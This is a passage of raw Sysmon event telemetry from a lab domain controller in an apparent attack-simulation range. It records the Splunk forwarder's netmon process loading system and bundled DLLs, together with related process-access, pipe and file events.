CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x800000000000000057345632Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x800000000000000057345631Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.916{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x800000000000000057345630Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.908{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x800000000000000057345629Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.908{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x800000000000000057345628Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057345627Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057345626Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057345625Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057345624Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x800000000000000057345623Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057345622Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x800000000000000057345621Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x800000000000000057345620Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x800000000000000057345619Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057345618Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x800000000000000057345617Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x800000000000000057345616Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057345615Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x800000000000000057345614Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x800000000000000057345613Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057345612Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057345611Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x800000000000000057345610Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x800000000000000057345609Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057345608Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x800000000000000057345607Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x800000000000000057345606Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x800000000000000057345605Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x800000000000000057345604Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057345603Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x800000000000000057345602Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 11241100x800000000000000057345601Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-09-16 14:18:25.134 23542300x800000000000000057345600Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C63DDE6AF646238C88D4814E00B4E95,SHA256=B83B15FF7C8C11C08635393C96BDF86666ADDD7C0DAD87D14C1B8E5A7AA679FEfalsetrue 734700x800000000000000057345599Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057345598Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057345597Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 10341000x800000000000000057345596Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-BB8B-618B-50A0-04000000F101}92124768C:\Windows\system32\conhost.exe{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000057345595Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-BB9D-618B-83A0-04000000F101}5620C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-09-16 14:18:46.122 23542300x800000000000000057345594Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-BB9D-618B-83A0-04000000F101}5620NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73EA858F572181ED8DC3226F41A17130,SHA256=FB4784885E0183173403777F20ACE3694076FD0CF242D5AD7427AC00AD2831B6falsetrue 734700x800000000000000057345593Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057345592Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057345591Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057345590Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exeMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3trueSplunk, Inc.Valid 10341000x800000000000000057345589Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-8868-6164-0500-00000000F101}424520C:\Windows\system32\csrss.exe{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000057345588Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.893{8B6011A9-BB8A-618B-4CA0-04000000F101}74521152C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000057345587Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.878{8B6011A9-5B46-618E-44F3-04000000F101}3288C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{8B6011A9-886B-6164-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3{8B6011A9-BB8A-618B-4CA0-04000000F101}7452C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 18141800x800000000000000057345586Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.877{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345585Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:10.877{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345584Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.877{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345583Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:10.877{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x800000000000000057345582Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-ConnectPipe2021-11-12 12:17:10.877{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x800000000000000057345581Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreatePipe2021-11-12 12:17:10.877{8B6011A9-BB8A-618B-4CA0-04000000F101}7452<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 23542300x800000000000000057345580Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:17:10.833{8B6011A9-887D-6164-2C00-00000000F101}2924NT AUTHORITY\SYSTEMC:\Program 